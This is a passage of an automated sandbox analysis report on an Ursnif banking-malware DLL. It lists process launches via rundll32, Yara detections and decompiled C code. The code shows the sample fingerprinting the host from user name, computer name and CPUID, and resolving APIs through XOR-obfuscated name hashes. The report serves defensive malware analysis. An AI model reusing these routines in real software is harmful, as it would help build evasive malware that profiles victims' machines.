                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              Imagebase:0x7ff721e20000
                                                                                                                                                                                                                              File size:823560 bytes
                                                                                                                                                                                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:31
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:32
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                              Imagebase:0x1050000
                                                                                                                                                                                                                              File size:822536 bytes
                                                                                                                                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:36
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:47
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Code Analysis


                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A89DE1(char __eax, void* __esi) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				long _t50;
                                                                                                                                                                                                                                				char _t59;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t69 = __esi;
                                                                                                                                                                                                                                				_t65 = __eax;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = __eax;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t59 =  *0xa8d2a8; // 0xd448b889
                                                                                                                                                                                                                                					_v12 = _t59;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t64 = _t69;
                                                                                                                                                                                                                                				E00A84E13( &_v12, _t64);
                                                                                                                                                                                                                                				if(_t65 != 0) {
                                                                                                                                                                                                                                					 *_t69 =  *_t69 ^  *0xa8d2dc ^ 0x46d76429;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                					_t50 = _v8;
                                                                                                                                                                                                                                					if(_t50 != 0) {
                                                                                                                                                                                                                                						_t62 = RtlAllocateHeap( *0xa8d270, 0, _t50 + _t50);
                                                                                                                                                                                                                                						if(_t62 != 0) {
                                                                                                                                                                                                                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                								_t64 = _t62;
                                                                                                                                                                                                                                								 *_t69 =  *_t69 ^ E00A8680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							HeapFree( *0xa8d270, 0, _t62);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t61 = __imp__;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t34 = _v8;
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t68 = RtlAllocateHeap( *0xa8d270, 0, _t34 + _t34);
                                                                                                                                                                                                                                					if(_t68 != 0) {
                                                                                                                                                                                                                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                							_t64 = _t68;
                                                                                                                                                                                                                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A8680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0xa8d270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				asm("cpuid");
                                                                                                                                                                                                                                				_t67 =  &_v28;
                                                                                                                                                                                                                                				 *_t67 = 1;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                                                				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                                                				return _t39;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A89E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A89E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A89E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A8587F), ref: 00A89E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A89E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A89E98
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A89EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A8587F), ref: 00A89EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 9be7ab49fb24a8199fd0e82526f4226cff2ab13b2738179620c4245da5b25465
                                                                                                                                                                                                                                • Instruction ID: 076cce91c82eb1e6232d105e15d5b2cd0525d8c51bafc6de7458a3f3e1929bc2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9be7ab49fb24a8199fd0e82526f4226cff2ab13b2738179620c4245da5b25465
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14310D71A00209EFDB10EFA9DD81AAEBBF9FF48350F254469E545D7260E730DE069B11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E736D6760(CHAR* __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                				CHAR* _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                                                				char _v76;
                                                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                                                				intOrPtr _v84;
                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                                				intOrPtr* _t80;
                                                                                                                                                                                                                                				char _t81;
                                                                                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                                                                                				intOrPtr* _t86;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t87;
                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                				signed int _t95;
                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                				signed int _t107;
                                                                                                                                                                                                                                				signed int _t113;
                                                                                                                                                                                                                                				signed int _t117;
                                                                                                                                                                                                                                				signed char _t121;
                                                                                                                                                                                                                                				signed char _t122;
                                                                                                                                                                                                                                				signed char _t123;
                                                                                                                                                                                                                                				signed char _t124;
                                                                                                                                                                                                                                				signed char _t125;
                                                                                                                                                                                                                                				signed char _t126;
                                                                                                                                                                                                                                				signed int _t134;
                                                                                                                                                                                                                                				signed int _t137;
                                                                                                                                                                                                                                				signed int _t140;
                                                                                                                                                                                                                                				signed int _t143;
                                                                                                                                                                                                                                				signed int _t144;
                                                                                                                                                                                                                                				signed int _t146;
                                                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                                                				signed int _t150;
                                                                                                                                                                                                                                				signed int _t151;
                                                                                                                                                                                                                                				intOrPtr* _t159;
                                                                                                                                                                                                                                				intOrPtr* _t161;
                                                                                                                                                                                                                                				intOrPtr* _t162;
                                                                                                                                                                                                                                				intOrPtr* _t163;
                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                				intOrPtr* _t165;
                                                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                                                				intOrPtr* _t167;
                                                                                                                                                                                                                                				signed int _t168;
                                                                                                                                                                                                                                				void* _t176;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t80 = __ecx;
                                                                                                                                                                                                                                				_v16 = __edx;
                                                                                                                                                                                                                                				_t163 = __edx;
                                                                                                                                                                                                                                				_t149 = 0;
                                                                                                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                                                                                                				_t121 =  *__edx;
                                                                                                                                                                                                                                				if(_t121 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t146 = _t121 + 0x00000020 & 0x000000ff;
                                                                                                                                                                                                                                						_t163 = _t163 + 1;
                                                                                                                                                                                                                                						_t117 = _t121 & 0x000000ff;
                                                                                                                                                                                                                                						_t121 =  *_t163;
                                                                                                                                                                                                                                						_t147 =  >=  ? _t117 : _t146;
                                                                                                                                                                                                                                						_t118 =  >=  ? _t117 : _t146;
                                                                                                                                                                                                                                						_t149 = _t149 * 0x00000101 + ( >=  ? _t117 : _t146) ^ ( >=  ? _t117 : _t146) << 0x00000010;
                                                                                                                                                                                                                                					} while (_t121 != 0);
                                                                                                                                                                                                                                					_t80 = _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t122 =  *_t80;
                                                                                                                                                                                                                                				_t164 = 0;
                                                                                                                                                                                                                                				_t159 = _t80;
                                                                                                                                                                                                                                				while(_t122 != 0) {
                                                                                                                                                                                                                                					_t144 = _t122 + 0x00000020 & 0x000000ff;
                                                                                                                                                                                                                                					_t159 = _t159 + 1;
                                                                                                                                                                                                                                					_t113 = _t122 & 0x000000ff;
                                                                                                                                                                                                                                					_t122 =  *_t159;
                                                                                                                                                                                                                                					_t145 =  >=  ? _t113 : _t144;
                                                                                                                                                                                                                                					_t114 =  >=  ? _t113 : _t144;
                                                                                                                                                                                                                                					_t164 = _t164 * 0x00000101 + ( >=  ? _t113 : _t144) ^ ( >=  ? _t113 : _t144) << 0x00000010;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t81 = E736D6620(_t164, _t149);
                                                                                                                                                                                                                                				if(_t81 == 0) {
                                                                                                                                                                                                                                					_v36 = _t81;
                                                                                                                                                                                                                                					_v32 = 0x70194975;
                                                                                                                                                                                                                                					_v28 = 0x661a4f75;
                                                                                                                                                                                                                                					_v24 = 0x55015458;
                                                                                                                                                                                                                                					_v20 = 0x14782639;
                                                                                                                                                                                                                                					if(_v36 == 0) {
                                                                                                                                                                                                                                						_t143 = 0;
                                                                                                                                                                                                                                						asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							 *(_t176 + _t143 * 4 - 0x1c) =  *(_t176 + _t143 * 4 - 0x1c) ^ 0x14782639;
                                                                                                                                                                                                                                							_t143 = _t143 + 1;
                                                                                                                                                                                                                                						} while (_t143 < 4);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t123 = _v32;
                                                                                                                                                                                                                                					_t165 =  &_v32;
                                                                                                                                                                                                                                					_t150 = 0;
                                                                                                                                                                                                                                					while(_t123 != 0) {
                                                                                                                                                                                                                                						_t23 = _t123 + 0x20; // 0x70194995
                                                                                                                                                                                                                                						_t165 = _t165 + 1;
                                                                                                                                                                                                                                						_t107 = _t123 & 0x000000ff;
                                                                                                                                                                                                                                						_t123 =  *_t165;
                                                                                                                                                                                                                                						_t142 =  >=  ? _t107 : _t23 & 0x000000ff;
                                                                                                                                                                                                                                						_t108 =  >=  ? _t107 : _t23 & 0x000000ff;
                                                                                                                                                                                                                                						_t150 = _t150 * 0x00000101 + ( >=  ? _t107 : _t23 & 0x000000ff) ^ ( >=  ? _t107 : _t23 & 0x000000ff) << 0x00000010;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v56 = 0;
                                                                                                                                                                                                                                					_v52 = 0x59507a43;
                                                                                                                                                                                                                                					_v48 = 0x2531734d;
                                                                                                                                                                                                                                					_v44 = 0x5b4e7b26;
                                                                                                                                                                                                                                					_v40 = 0x17023f08;
                                                                                                                                                                                                                                					if(_v56 == 0) {
                                                                                                                                                                                                                                						_t140 = 0;
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							 *(_t176 + _t140 * 4 - 0x30) =  *(_t176 + _t140 * 4 - 0x30) ^ 0x17023f08;
                                                                                                                                                                                                                                							_t140 = _t140 + 1;
                                                                                                                                                                                                                                						} while (_t140 < 4);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t124 = _v52;
                                                                                                                                                                                                                                					_t161 =  &_v52;
                                                                                                                                                                                                                                					_t166 = 0;
                                                                                                                                                                                                                                					while(_t124 != 0) {
                                                                                                                                                                                                                                						_t40 = _t124 + 0x20; // 0x59507a63
                                                                                                                                                                                                                                						_t161 = _t161 + 1;
                                                                                                                                                                                                                                						_t101 = _t124 & 0x000000ff;
                                                                                                                                                                                                                                						_t124 =  *_t161;
                                                                                                                                                                                                                                						_t139 =  >=  ? _t101 : _t40 & 0x000000ff;
                                                                                                                                                                                                                                						_t102 =  >=  ? _t101 : _t40 & 0x000000ff;
                                                                                                                                                                                                                                						_t166 = _t166 * 0x00000101 + ( >=  ? _t101 : _t40 & 0x000000ff) ^ ( >=  ? _t101 : _t40 & 0x000000ff) << 0x00000010;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t84 = E736D6620(_t166, _t150);
                                                                                                                                                                                                                                					_v76 = 0;
                                                                                                                                                                                                                                					_v72 = 0x511f4216;
                                                                                                                                                                                                                                					_v68 = 0x40084823;
                                                                                                                                                                                                                                					_v64 = 0x64194335;
                                                                                                                                                                                                                                					_v60 = 0x16b5422;
                                                                                                                                                                                                                                					_v12 = _t84;
                                                                                                                                                                                                                                					if(_v76 == 0) {
                                                                                                                                                                                                                                						_t137 = 0;
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							 *(_t176 + _t137 * 4 - 0x44) =  *(_t176 + _t137 * 4 - 0x44) ^ 0x016b2751;
                                                                                                                                                                                                                                							_t137 = _t137 + 1;
                                                                                                                                                                                                                                						} while (_t137 < 4);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t125 = _v72;
                                                                                                                                                                                                                                					_t167 =  &_v72;
                                                                                                                                                                                                                                					_t151 = 0;
                                                                                                                                                                                                                                					while(_t125 != 0) {
                                                                                                                                                                                                                                						_t58 = _t125 + 0x20; // 0x511f4236
                                                                                                                                                                                                                                						_t167 = _t167 + 1;
                                                                                                                                                                                                                                						_t95 = _t125 & 0x000000ff;
                                                                                                                                                                                                                                						_t125 =  *_t167;
                                                                                                                                                                                                                                						_t136 =  >=  ? _t95 : _t58 & 0x000000ff;
                                                                                                                                                                                                                                						_t96 =  >=  ? _t95 : _t58 & 0x000000ff;
                                                                                                                                                                                                                                						_t151 = _t151 * 0x00000101 + ( >=  ? _t95 : _t58 & 0x000000ff) ^ ( >=  ? _t95 : _t58 & 0x000000ff) << 0x00000010;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v96 = 0;
                                                                                                                                                                                                                                					_v92 = 0x12472d7b;
                                                                                                                                                                                                                                					_v88 = 0x6e262475;
                                                                                                                                                                                                                                					_v84 = 0x10592c1e;
                                                                                                                                                                                                                                					_v80 = 0x5c156830;
                                                                                                                                                                                                                                					if(_v96 == 0) {
                                                                                                                                                                                                                                						_t134 = 0;
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							 *(_t176 + _t134 * 4 - 0x58) =  *(_t176 + _t134 * 4 - 0x58) ^ 0x5c156830;
                                                                                                                                                                                                                                							_t134 = _t134 + 1;
                                                                                                                                                                                                                                						} while (_t134 < 4);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t126 = _v92;
                                                                                                                                                                                                                                					_t162 =  &_v92;
                                                                                                                                                                                                                                					_t168 = 0;
                                                                                                                                                                                                                                					while(_t126 != 0) {
                                                                                                                                                                                                                                						_t75 = _t126 + 0x20; // 0x12472d9b
                                                                                                                                                                                                                                						_t162 = _t162 + 1;
                                                                                                                                                                                                                                						_t89 = _t126 & 0x000000ff;
                                                                                                                                                                                                                                						_t126 =  *_t162;
                                                                                                                                                                                                                                						_t133 =  >=  ? _t89 : _t75 & 0x000000ff;
                                                                                                                                                                                                                                						_t90 =  >=  ? _t89 : _t75 & 0x000000ff;
                                                                                                                                                                                                                                						_t168 = _t168 * 0x00000101 + ( >=  ? _t89 : _t75 & 0x000000ff) ^ ( >=  ? _t89 : _t75 & 0x000000ff) << 0x00000010;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t86 = E736D6620(_t168, _t151);
                                                                                                                                                                                                                                					_t87 = LoadLibraryA(_v8);
                                                                                                                                                                                                                                					_t81 =  *_t86(_t87, _v16);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t81;
                                                                                                                                                                                                                                			}






























































                                                                                                                                                                                                                                0x736d68c1
                                                                                                                                                                                                                                0x736d68c3
                                                                                                                                                                                                                                0x736d68cc
                                                                                                                                                                                                                                0x736d68d4
                                                                                                                                                                                                                                0x736d68d6
                                                                                                                                                                                                                                0x736d68dc
                                                                                                                                                                                                                                0x736d68e1
                                                                                                                                                                                                                                0x736d68e5
                                                                                                                                                                                                                                0x736d68ec
                                                                                                                                                                                                                                0x736d68f3
                                                                                                                                                                                                                                0x736d68fa
                                                                                                                                                                                                                                0x736d6908
                                                                                                                                                                                                                                0x736d690b
                                                                                                                                                                                                                                0x736d690d
                                                                                                                                                                                                                                0x736d6910
                                                                                                                                                                                                                                0x736d6919
                                                                                                                                                                                                                                0x736d691d
                                                                                                                                                                                                                                0x736d691e
                                                                                                                                                                                                                                0x736d6910
                                                                                                                                                                                                                                0x736d6923
                                                                                                                                                                                                                                0x736d6926
                                                                                                                                                                                                                                0x736d6929
                                                                                                                                                                                                                                0x736d692d
                                                                                                                                                                                                                                0x736d6930
                                                                                                                                                                                                                                0x736d6939
                                                                                                                                                                                                                                0x736d693c
                                                                                                                                                                                                                                0x736d693f
                                                                                                                                                                                                                                0x736d6941
                                                                                                                                                                                                                                0x736d694a
                                                                                                                                                                                                                                0x736d6952
                                                                                                                                                                                                                                0x736d6954
                                                                                                                                                                                                                                0x736d6958
                                                                                                                                                                                                                                0x736d695c
                                                                                                                                                                                                                                0x736d6963
                                                                                                                                                                                                                                0x736d696a
                                                                                                                                                                                                                                0x736d6971
                                                                                                                                                                                                                                0x736d697f
                                                                                                                                                                                                                                0x736d6981
                                                                                                                                                                                                                                0x736d6983
                                                                                                                                                                                                                                0x736d698c
                                                                                                                                                                                                                                0x736d6990
                                                                                                                                                                                                                                0x736d6991
                                                                                                                                                                                                                                0x736d6983
                                                                                                                                                                                                                                0x736d6996
                                                                                                                                                                                                                                0x736d6999
                                                                                                                                                                                                                                0x736d699c
                                                                                                                                                                                                                                0x736d69a0
                                                                                                                                                                                                                                0x736d69a2
                                                                                                                                                                                                                                0x736d69ab
                                                                                                                                                                                                                                0x736d69ae
                                                                                                                                                                                                                                0x736d69b1
                                                                                                                                                                                                                                0x736d69b3
                                                                                                                                                                                                                                0x736d69bc
                                                                                                                                                                                                                                0x736d69c4
                                                                                                                                                                                                                                0x736d69c6
                                                                                                                                                                                                                                0x736d69cc
                                                                                                                                                                                                                                0x736d69d6
                                                                                                                                                                                                                                0x736d69dd
                                                                                                                                                                                                                                0x736d69dd
                                                                                                                                                                                                                                0x736d69e5

APIs
• LoadLibraryA.KERNELBASE(?,0000000F,KERNEL32.dll), ref: 736D69D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID: &{N[$CzPY$KERNEL32.dll$Ms1%$a$a$u$&n
• API String ID: 1029625771-3591805379
• Opcode ID: b4c7fb449496acf1fc91a0ec6e0841375ee90e968ec1af219f794c9a184cc063
• Instruction ID: a22a1960ca3932b13ce890df88276a97bf0b5913f97f0ee7a361902037fdca68
• Opcode Fuzzy Hash: b4c7fb449496acf1fc91a0ec6e0841375ee90e968ec1af219f794c9a184cc063
